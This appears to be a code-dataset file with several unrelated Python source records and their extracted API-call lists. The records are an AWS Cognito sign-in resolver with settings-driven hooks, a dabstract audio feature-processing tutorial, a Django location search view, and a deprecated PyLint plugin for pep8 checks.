aws_access_key_id=aws_access_key_id,
aws_secret_access_key=aws_secret_access_key,
)
digest = hmac.new(
key=app_client_secret.encode("utf-8"),
msg=(username + app_client_id).encode("utf-8"),
digestmod=hashlib.sha256,
).digest()
response = cognitoIdp.initiate_auth(
AuthFlow="USER_PASSWORD_AUTH",
AuthParameters={
"USERNAME": username,
"PASSWORD": password,
"SECRET_HASH": base64.b64encode(digest).decode(),
},
ClientId=app_client_id,
)
if not response or not response.get("AuthenticationResult", {}).get("IdToken"):
raise Exception("Failed to sign in on cognito")
# @TODO: hooks
hooks = (
[
hook.strip()
for hook in settings.get(
"custom_signin_hooks",
).split(",")
]
if settings.get("custom_signin_hooks")
else []
)
# hooks = ["relation_engine:RelationEngine:get_default_for_login"]
token_claims = jwt.get_unverified_claims(
response.get("AuthenticationResult").get("IdToken")
)
if token_claims.get("teams"):
token_claims.pop("teams")
if len(hooks):
logger = info.context.get("logger")
for hook in hooks:
fragments = hook.split(":", 3)
if len(fragments) < 3:
for _ in range(3 - len(fragments)):
fragments.append(None)
elif len(fragments) > 3:
fragments = fragments[0:3]
module_name, class_name, function_name = fragments
# 1. Load module by dynamic
spec = find_spec(module_name)
if spec is None:
continue
agent = import_module(module_name)
if hasattr(agent, class_name):
agent = getattr(agent, class_name)(logger)
if not hasattr(agent, function_name):
continue
result = getattr(agent, function_name)(token_claims)
if type(result) is dict:
token_claims.update(result)
return CertificateType(
access_token=response.get("AuthenticationResult").get("AccessToken"),
id_token=response.get("AuthenticationResult").get("IdToken"),
refresh_token=response.get("AuthenticationResult").get("RefreshToken"),
expires_in=response.get("AuthenticationResult").get("ExpiresIn"),
token_type=response.get("AuthenticationResult").get("TokenType"),
context=token_claims,
permissions=_get_user_permissions(token_claims),
)
except Exception as e:
raise e
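# Recap of the SECRET_HASH computed in _resolve_certificate, per the AWS Cognito
# docs: Base64(HMAC_SHA256(key=app_client_secret, msg=username + app_client_id)).
# A standalone sketch (illustrative helper, not part of the original module):
# def _secret_hash(username, client_id, client_secret):
#     digest = hmac.new(client_secret.encode("utf-8"),
#                        (username + client_id).encode("utf-8"),
#                        hashlib.sha256).digest()
#     return base64.b64encode(digest).decode()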
# Role uniqueness detection
def _resolve_detection(info, **kwargs):
role_name = kwargs.get("name")
filter_conditions = (
((RoleModel.name == role_name))
if role_name is not None and role_name != ""
else (
(
RoleModel.type.is_in(
*[
RoleType.ACCOUNT_MANAGER.value,
RoleType.QC_MANAGER.value,
RoleType.DEPT_MANAGER.value,
]
)
)
)
)
types = {
t.value: {
"type_alias": t.name,
"is_exclusive": t.value != RoleType.NORMAL.value,
"roles": [],
}
for t in RoleType
}
roles = {}
for role in RoleModel.scan(filter_condition=filter_conditions):
role = role.__dict__["attribute_values"]
if role.get("type") is not None:
if roles.get(role.get("type")) is None and types.get(role.get("type")):
roles[role.get("type")] = types.get(role.get("type"))
if (
roles.get(role.get("type")) is not None
and type(roles[role.get("type")].get("roles")) is list
):
roles[role.get("type")]["roles"].append(
{
"name": role.get("name", ""),
}
)
return RoleDetectionType(roles=roles)
|
[
"silvaengine_utility.Utility.json_dumps",
"boto3.client",
"importlib.import_module",
"importlib.util.find_spec",
"silvaengine_utility.Utility.import_dynamically",
"base64.b64encode",
"os.getenv"
] |
[((14608, 14747), 'boto3.client', 'boto3.client', (['"""cognito-idp"""'], {'region_name': 'region_name', 'aws_access_key_id': 'aws_access_key_id', 'aws_secret_access_key': 'aws_secret_access_key'}), "('cognito-idp', region_name=region_name, aws_access_key_id=\n aws_access_key_id, aws_secret_access_key=aws_secret_access_key)\n", (14620, 14747), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((13552, 13575), 'os.getenv', 'os.getenv', (['"""REGIONNAME"""'], {}), "('REGIONNAME')\n", (13561, 13575), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((13728, 13758), 'os.getenv', 'os.getenv', (['"""aws_access_key_id"""'], {}), "('aws_access_key_id')\n", (13737, 13758), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((13923, 13957), 'os.getenv', 'os.getenv', (['"""aws_secret_access_key"""'], {}), "('aws_secret_access_key')\n", (13932, 13957), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((14098, 14124), 'os.getenv', 'os.getenv', (['"""app_client_id"""'], {}), "('app_client_id')\n", (14107, 14124), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((14277, 14307), 'os.getenv', 'os.getenv', (['"""app_client_secret"""'], {}), "('app_client_secret')\n", (14286, 14307), False, 'import boto3, os, hmac, hashlib, base64, json\n'), ((10972, 11063), 'silvaengine_utility.Utility.import_dynamically', 'Utility.import_dynamically', (['module_name', 'function_name', 'class_name', "{'logger': logger}"], {}), "(module_name, function_name, class_name, {\n 'logger': logger})\n", (10998, 11063), False, 'from silvaengine_utility import Utility\n'), ((13096, 13149), 'silvaengine_utility.Utility.json_dumps', 'Utility.json_dumps', (["role.__dict__['attribute_values']"], {}), "(role.__dict__['attribute_values'])\n", (13114, 13149), False, 'from silvaengine_utility import Utility\n'), ((16552, 16574), 'importlib.util.find_spec', 'find_spec', (['module_name'], {}), '(module_name)\n', (16561, 16574), False, 'from importlib.util import find_spec\n'), ((16663, 16689), 'importlib.import_module', 'import_module', (['module_name'], {}), '(module_name)\n', (16676, 16689), False, 'from importlib import import_module\n'), ((15221, 15245), 'base64.b64encode', 'base64.b64encode', (['digest'], {}), '(digest)\n', (15237, 15245), False, 'import boto3, os, hmac, hashlib, base64, json\n')]
|
import numpy as np
import os
from scipy.io.wavfile import write as audio_write
### Generate data
data = np.random.uniform(size=(10000)) # single example
DATA = np.random.uniform(size=(10,10000)) # multi example
wavfiles, numpyfiles = [], []
datafolder = 'data_intro/data'
os.makedirs(datafolder,exist_ok=True)
os.makedirs(datafolder + '_numpy',exist_ok=True)
for k,D in enumerate(DATA):
wavfiles.append(os.path.join(datafolder,str(k) + '.wav'))
numpyfiles.append(os.path.join(datafolder + '_numpy',str(k) + '.npy'))
np.save(numpyfiles[k], D)
audio_write(wavfiles[k], rate=1, data=D)
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
# make sure to provide the sampling frequency to dp. Kwargs are always accessible to
# all processing layers. Therefore, you should make sure naming DOES NOT overlap
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time (alternative)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
# in this example, fs is already set in the processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0,fs=1))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.summary()
# apply processing chain to data
output_data = dp(data)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# create processing chain
dp = ProcessingChain()
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit processing chain as Normalizer contains a 'fit' method to init parameters
dp.fit(DATA, fs=1)
# apply processing chain to data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from a wav file
### As a consequence no extra fs information needs to be provided for processing. This is read from the wav.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(WavDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
dp.summary()
# fit to wavfiles
dp.fit(wavfiles) #fit from wav files
#dp.fit(['data_intro/data/0.wav', 'data_intro/data/1.wav', 'data_intro/data/3.wav', ...])
output_data = dp(wavfiles[2]) # process from wavfiles
#output_data = dp('data_intro/data/2.wav')
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before but the data is loaded from a numpy file.
### As a consequence extra fs information needs to be provided for processing.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
# define processing chain
dp = ProcessingChain()
dp.add(NumpyDatareader())
dp.add(Framing(windowsize=10,stepsize=10,axis=0))
dp.add(FFT(axis=1))
dp.add(Aggregation(methods=['mean', 'std'], axis=0, combine='concatenate'))
dp.add(Normalizer(type='standard'))
# fit to numpy files
dp.fit(numpyfiles, fs=1) #fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
output_data = dp(numpyfiles[2],fs=1) #fit from npy files
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from hardcoded configuration)
from dabstract.dataprocessor import ProcessingChain
config = {'chain': [{'name': 'NumpyDatareader'},
{'name': 'Framing',
'parameters': {'axis': 0, 'stepsize': 10, 'windowsize': 10}},
{'name': 'FFT',
'parameters': {'axis': 1}},
{'name': 'Logarithm'},
{'name': 'Aggregation',
'parameters': {'axis': 0,
'combine': 'concatenate',
'methods': ['mean', 'std']}},
{'name': 'Normalizer',
'parameters': {'type': 'standard'}}]}
dp = ProcessingChain(config)
dp.summary()
# OR
# dp = ProcessingChain()
# dp.add(config)
dp.fit(numpyfiles, fs=1) #fit from npy files
#dp.fit(['data_intro/data_numpy/0.npy', 'data_intro/data_numpy/1.npy', 'data_intro/data_numpy/3.npy', ...], fs=1)
output_data = dp(numpyfiles[2],fs=1) #fit from npy files
#output_data = dp('data_intro/data_numpy/2.npy',fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create an STFT, get mean and std over time and fit this to normalization (created from yaml config)
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration
config = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'))
# create processing chain from the yaml config
dp = ProcessingChain(config)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Same as before, but now loading the yaml and feeding it to ProcessingChain() is available as a one-liner.
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
class custom_processor(Processor):
def process(self, data, **kwargs):
return data * 100, {}
# return data, information that can be propagated to consecutive layers
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add a custom processor to the dp.chain
dp.add(custom_processor())
dp.summary()
# Fit data to chain
dp.fit(DATA, fs=1)
# process
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing with fit option
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain, Processor
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# custom processor.
# This is a minimal example of what a processor can do.
class custom_processor(Processor):
def process(self, data, **kwargs):
return (data - self.mean) * 100, {}
# return data, information that can be propagated to consecutive layers
def fit(self, data, info, **kwargs):
self.mean = np.mean(data)
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processor
dp.add(custom_processor())
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fitted on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to use any function in a dabstract processing chain and still use info propagation
# -- processing chain from config BIS
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
def custom_fct(data,**kwargs):
return (data - 5) * 100
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
dp.summary()
# add custom processors
dp.add(custom_fct)
dp.add(lambda x: x*100)
dp.summary()
# fit data (it's recursive, so both the normalizer and the custom_processor are fitted on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Example on how to add a custom processing layer within configuration using !class
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config_custom', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# fit data (it's recursive, so both the normalizer and the custom_processor are fitted on the data)
dp.fit(DATA, fs=1)
# process data
output_data = dp(data, fs=1)
print(output_data.shape)
print('\n\n\n')
# -------------------------------------------------------------------------
### Create a lazy data source from disk with additional processing
### Adds a lazy mapping function to DATA and allows multi-example indexing
# -- processing chain for multiple examples
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
from dabstract.abstract.abstract import MapAbstract, DataAbstract
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make and abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], datab[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs=1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
datab = DataAbstract(datab, fs=1)
print(datab)
print('\n\n\n')
# -------------------------------------------------------------------------
### Add multi-processing to lazy data source
from dabstract.dataprocessor import ProcessingChain
from dabstract.dataprocessor.processors import *
from dabstract.utils import load_yaml_config
# get yaml configuration and process with ProcessingChain()
dp = load_yaml_config(filename='Readme_1_dp_config', path=os.path.join('configs','dp'),post_process=ProcessingChain)
# Fit data
dp.fit(DATA, fs=1)
# Make and abstract data source
# you can now access data as with typical indexing
# e.g. datab[0], datab[1]
# in this way it accesses DATA[0] and DATA[1] respectively with the additional dp
datab = MapAbstract(DATA,dp, fs = 1)
print(datab)
# allow for multi indexing, e.g. data[:] or data[0,1]
# and allow for multiprocessing with the workers and buffer_len flags
# not only indexing is parallelized, but so is the iterator
datab = DataAbstract(datab, workers=2, buffer_len=2)
print(datab)
for k,d in enumerate(datab):
print('Example ' + str(k))
print(d)
|
[
"numpy.random.uniform",
"numpy.save",
"os.makedirs",
"scipy.io.wavfile.write",
"dabstract.abstract.abstract.DataAbstract",
"numpy.mean",
"dabstract.abstract.abstract.MapAbstract",
"os.path.join",
"dabstract.dataprocessor.ProcessingChain"
] |
[((105, 134), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(10000)'}), '(size=10000)\n', (122, 134), True, 'import numpy as np\n'), ((161, 196), 'numpy.random.uniform', 'np.random.uniform', ([], {'size': '(10, 10000)'}), '(size=(10, 10000))\n', (178, 196), True, 'import numpy as np\n'), ((273, 311), 'os.makedirs', 'os.makedirs', (['datafolder'], {'exist_ok': '(True)'}), '(datafolder, exist_ok=True)\n', (284, 311), False, 'import os\n'), ((311, 360), 'os.makedirs', 'os.makedirs', (["(datafolder + '_numpy')"], {'exist_ok': '(True)'}), "(datafolder + '_numpy', exist_ok=True)\n", (322, 360), False, 'import os\n'), ((857, 874), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (872, 874), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((1631, 1648), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (1646, 1648), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((2197, 2214), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (2212, 2214), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((2984, 3001), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (2999, 3001), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((3888, 3905), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', ([], {}), '()\n', (3903, 3905), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((5318, 5341), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', (['config'], {}), '(config)\n', (5333, 5341), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((6210, 6233), 'dabstract.dataprocessor.ProcessingChain', 'ProcessingChain', (['config'], {}), '(config)\n', (6225, 6233), False, 'from dabstract.dataprocessor import ProcessingChain\n'), ((11558, 11585), 'dabstract.abstract.abstract.MapAbstract', 'MapAbstract', (['DATA', 'dp'], {'fs': '(1)'}), '(DATA, dp, fs=1)\n', (11569, 11585), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((11660, 11685), 'dabstract.abstract.abstract.DataAbstract', 'DataAbstract', (['datab'], {'fs': '(1)'}), '(datab, fs=1)\n', (11672, 11685), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((12389, 12416), 'dabstract.abstract.abstract.MapAbstract', 'MapAbstract', (['DATA', 'dp'], {'fs': '(1)'}), '(DATA, dp, fs=1)\n', (12400, 12416), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((12615, 12659), 'dabstract.abstract.abstract.DataAbstract', 'DataAbstract', (['datab'], {'workers': '(2)', 'buffer_len': '(2)'}), '(datab, workers=2, buffer_len=2)\n', (12627, 12659), False, 'from dabstract.abstract.abstract import MapAbstract, DataAbstract\n'), ((529, 554), 'numpy.save', 'np.save', (['numpyfiles[k]', 'D'], {}), '(numpyfiles[k], D)\n', (536, 554), True, 'import numpy as np\n'), ((559, 599), 'scipy.io.wavfile.write', 'audio_write', (['wavfiles[k]'], {'rate': '(1)', 'data': 'D'}), '(wavfiles[k], rate=1, data=D)\n', (570, 599), True, 'from scipy.io.wavfile import write as audio_write\n'), ((6128, 6157), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (6140, 6157), False, 'import os\n'), ((6794, 6823), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (6806, 6823), False, 'import os\n'), ((7667, 7696), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", 
(7679, 7696), False, 'import os\n'), ((8610, 8623), 'numpy.mean', 'np.mean', (['data'], {}), '(data)\n', (8617, 8623), True, 'import numpy as np\n'), ((8743, 8772), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (8755, 8772), False, 'import os\n'), ((9624, 9653), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (9636, 9653), False, 'import os\n'), ((10415, 10444), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (10427, 10444), False, 'import os\n'), ((11271, 11300), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (11283, 11300), False, 'import os\n'), ((12102, 12131), 'os.path.join', 'os.path.join', (['"""configs"""', '"""dp"""'], {}), "('configs', 'dp')\n", (12114, 12131), False, 'import os\n')]
|
from django.shortcuts import render
from django.http import HttpResponse, HttpResponseRedirect, JsonResponse
from .models import Location
# ...
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
# Other views not displayed.
def detail(request, location_id):
location = Location.objects.get(id=location_id)
return render(request, 'detail.html', {'location': location})
def search(request):
search_val = request.GET.get('search', None)
if search_val is not None:
results = []
locations = Location.objects.filter(name__icontains=search_val)
for location in locations:
json = {}
json['name'] = location.name
json['link'] = '/' + str(location.id) + '/'
results.append(json)
return JsonResponse({'results':results})
else:
return render(request, 'search.html')
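# A minimal URLconf sketch for the two views above (URL names and patterns are
# assumptions, not from the original project):
# from django.conf.urls import url
# urlpatterns = [
#     url(r'^(?P<location_id>\d+)/$', detail, name='detail'),
#     url(r'^search/$', search, name='search'),
# ]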
|
[
"django.shortcuts.render",
"django.http.JsonResponse"
] |
[((361, 415), 'django.shortcuts.render', 'render', (['request', '"""detail.html"""', "{'location': location}"], {}), "(request, 'detail.html', {'location': location})\n", (367, 415), False, 'from django.shortcuts import render\n'), ((813, 847), 'django.http.JsonResponse', 'JsonResponse', (["{'results': results}"], {}), "({'results': results})\n", (825, 847), False, 'from django.http import HttpResponse, HttpResponseRedirect, JsonResponse\n'), ((872, 902), 'django.shortcuts.render', 'render', (['request', '"""search.html"""'], {}), "(request, 'search.html')\n", (878, 902), False, 'from django.shortcuts import render\n')]
|
# -*- coding: utf-8 -*-
'''
:codeauthor: :email:`<NAME> (<EMAIL>)`
:copyright: © 2013 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
===================
PEP-8 PyLint Plugin
===================
A bridge between the `pep8`_ library and PyLint
.. _`pep8`: http://pep8.readthedocs.org
'''
# ----- DEPRECATED PYLINT PLUGIN ------------------------------------------------------------------------------------>
# This Pylint plugin is deprecated. Development continues on the SaltPyLint package
# <---- DEPRECATED PYLINT PLUGIN -------------------------------------------------------------------------------------
from __future__ import absolute_import
import sys
import logging
import warnings
# Import PyLint libs
from pylint.interfaces import IRawChecker
from pylint.checkers import BaseChecker
from pylint.__pkginfo__ import numversion as pylint_version_info
# Import PEP8 libs
try:
from pep8 import StyleGuide, BaseReport
HAS_PEP8 = True
except ImportError:
HAS_PEP8 = False
warnings.warn(
'No pep8 library could be imported. No PEP8 checks will be done',
RuntimeWarning
)
_PROCESSED_NODES = {}
_KNOWN_PEP8_IDS = []
_UNHANDLED_PEP8_IDS = []
if HAS_PEP8 is True:
class PyLintPEP8Reporter(BaseReport):
def __init__(self, options):
super(PyLintPEP8Reporter, self).__init__(options)
self.locations = []
def error(self, line_number, offset, text, check):
code = super(PyLintPEP8Reporter, self).error(
line_number, offset, text, check
)
if code:
# E123, at least, is not reporting its code in the above call,
# don't want to bother about that now
self.locations.append((code, line_number))
class _PEP8BaseChecker(BaseChecker):
__implements__ = IRawChecker
name = 'pep8'
priority = -1
options = ()
msgs = None
_msgs = {}
msgs_map = {}
def __init__(self, linter=None):
# To avoid PyLint's deprecation warning about a missing symbolic name and
# because I don't want to add descriptions, let's make the descriptions
# equal to the messages.
if self.msgs is None:
self.msgs = {}
for code, (message, symbolic) in self._msgs.iteritems():
self.msgs[code] = (message, symbolic, message)
BaseChecker.__init__(self, linter=linter)
def process_module(self, node):
'''
process a module
the module's content is accessible via the node.file_stream object
'''
if node.path not in _PROCESSED_NODES:
stylechecker = StyleGuide(
parse_argv=False, config_file=True, quiet=2,
reporter=PyLintPEP8Reporter
)
_PROCESSED_NODES[node.path] = stylechecker.check_files([node.path])
for code, lineno in _PROCESSED_NODES[node.path].locations:
pylintcode = '{0}8{1}'.format(code[0], code[1:])
if pylintcode in self.msgs_map:
# This will be handled by PyLint itself, skip it
continue
if pylintcode not in _KNOWN_PEP8_IDS:
if pylintcode not in _UNHANDLED_PEP8_IDS:
_UNHANDLED_PEP8_IDS.append(pylintcode)
msg = 'The following code, {0}, was not handled by the PEP8 plugin'.format(pylintcode)
if logging.root.handlers:
logging.getLogger(__name__).warning(msg)
else:
sys.stderr.write('{0}\n'.format(msg))
continue
if pylintcode not in self._msgs:
# Not for our class implementation to handle
continue
if code in ('E111', 'E113'):
if _PROCESSED_NODES[node.path].lines[lineno-1].strip().startswith('#'):
# If E111 is triggered in a comment I consider it, at
# least, bad judgement. See https://github.com/jcrocholl/pep8/issues/300
# If E113 is triggered in comments, which I consider a bug,
# skip it. See https://github.com/jcrocholl/pep8/issues/274
continue
self.add_message(pylintcode, line=lineno, args=code)
class PEP8Indentation(_PEP8BaseChecker):
'''
Process PEP8 E1 codes
'''
_msgs = {
'E8101': ('PEP8 %s: indentation contains mixed spaces and tabs',
'indentation-contains-mixed-spaces-and-tabs'),
'E8111': ('PEP8 %s: indentation is not a multiple of four',
'indentation-is-not-a-multiple-of-four'),
'E8112': ('PEP8 %s: expected an indented block',
'expected-an-indented-block'),
'E8113': ('PEP8 %s: unexpected indentation',
'unexpected-indentation'),
'E8121': ('PEP8 %s: continuation line indentation is not a multiple of four',
'continuation-line-indentation-is-not-a-multiple-of-four'),
'E8122': ('PEP8 %s: continuation line missing indentation or outdented',
'continuation-line-missing-indentation-or-outdented'),
'E8123': ("PEP8 %s: closing bracket does not match indentation of opening bracket's line",
"closing-bracket-does-not-match-indentation-of-opening-bracket's-line"),
'E8124': ('PEP8 %s: closing bracket does not match visual indentation',
'closing-bracket-does-not-match-visual-indentation'),
'E8125': ('PEP8 %s: continuation line does not distinguish itself from next logical line',
'continuation-line-does-not-distinguish-itself-from-next-logical-line'),
'E8126': ('PEP8 %s: continuation line over-indented for hanging indent',
'continuation-line-over-indented-for-hanging-indent'),
'E8127': ('PEP8 %s: continuation line over-indented for visual indent',
'continuation-line-over-indented-for-visual-indent'),
'E8128': ('PEP8 %s: continuation line under-indented for visual indent',
'continuation-line-under-indented-for-visual-indent'),
'E8129': ('PEP8 %s: visually indented line with same indent as next logical line',
'visually-indented-line-with-same-indent-as-next-logical-line'),
'E8131': ('PEP8 %s: unaligned for hanging indent',
'unaligned-for-hanging-indent'),
'E8133': ('PEP8 %s: closing bracket is missing indentation',
'closing-bracket-is-missing-indentation'),
}
msgs_map = {
'E8126': 'C0330'
}
class PEP8Whitespace(_PEP8BaseChecker):
'''
Process PEP8 E2 codes
'''
_msgs = {
'E8201': ("PEP8 %s: whitespace after '('", "whitespace-after-'('"),
'E8202': ("PEP8 %s: whitespace before ')'", "whitespace-before-')'"),
'E8203': ("PEP8 %s: whitespace before ':'", "whitespace-before-':'"),
'E8211': ("PEP8 %s: whitespace before '('", "whitespace-before-'('"),
'E8221': ('PEP8 %s: multiple spaces before operator',
'multiple-spaces-before-operator'),
'E8222': ('PEP8 %s: multiple spaces after operator',
'multiple-spaces-after-operator'),
'E8223': ('PEP8 %s: tab before operator', 'tab-before-operator'),
'E8224': ('PEP8 %s: tab after operator', 'tab-after-operator'),
'E8225': ('PEP8 %s: missing whitespace around operator',
'missing-whitespace-around-operator'),
'E8226': ('PEP8 %s: missing whitespace around arithmetic operator',
'missing-whitespace-around-arithmetic-operator'),
'E8227': ('PEP8 %s: missing whitespace around bitwise or shift operator',
'missing-whitespace-around-bitwise-or-shift-operator'),
'E8228': ('PEP8 %s: missing whitespace around modulo operator',
'missing-whitespace-around-modulo-operator'),
'E8231': ("PEP8 %s: missing whitespace after ','",
"missing-whitespace-after-','"),
'E8241': ("PEP8 %s: multiple spaces after ','", "multiple-spaces-after-','"),
'E8242': ("PEP8 %s: tab after ','", "tab-after-','"),
'E8251': ('PEP8 %s: unexpected spaces around keyword / parameter equals',
'unexpected-spaces-around-keyword-/-parameter-equals'),
'E8261': ('PEP8 %s: at least two spaces before inline comment',
'at-least-two-spaces-before-inline-comment'),
'E8262': ("PEP8 %s: inline comment should start with '# '",
"inline-comment-should-start-with-'#-'"),
'E8265': ("PEP8 %s: block comment should start with '# '",
"block-comment-should-start-with-'# '"),
'E8271': ('PEP8 %s: multiple spaces after keyword',
'multiple-spaces-after-keyword'),
'E8272': ('PEP8 %s: multiple spaces before keyword',
'multiple-spaces-before-keyword'),
'E8273': ('PEP8 %s: tab after keyword', 'tab-after-keyword'),
'E8274': ('PEP8 %s: tab before keyword', 'tab-before-keyword'),
}
msgs_map = {
'E8222': 'C0326',
'E8225': 'C0326',
'E8251': 'C0326'
}
class PEP8BlankLine(_PEP8BaseChecker):
'''
Process PEP8 E3 codes
'''
_msgs = {
'E8301': ('PEP8 %s: expected 1 blank line, found 0',
'expected-1-blank-line,-found-0'),
'E8302': ('PEP8 %s: expected 2 blank lines, found 0',
'expected-2-blank-lines,-found-0'),
'E8303': ('PEP8 %s: too many blank lines (3)',
'too-many-blank-lines-(3)'),
'E8304': ('PEP8 %s: blank lines found after function decorator',
'blank-lines-found-after-function-decorator'),
}
class PEP8Import(_PEP8BaseChecker):
'''
Process PEP8 E4 codes
'''
_msgs = {
'E8401': ('PEP8 %s: multiple imports on one line',
'multiple-imports-on-one-line'),
}
class PEP8LineLength(_PEP8BaseChecker):
'''
Process PEP8 E5 codes
'''
_msgs = {
'E8501': ('PEP8 %s: line too long (82 > 79 characters)',
'line-too-long-(82->-79-characters)'),
'E8502': ('PEP8 %s: the backslash is redundant between brackets',
'the-backslash-is-redundant-between-brackets')
}
msgs_map = {
'E8501': 'C0301'
}
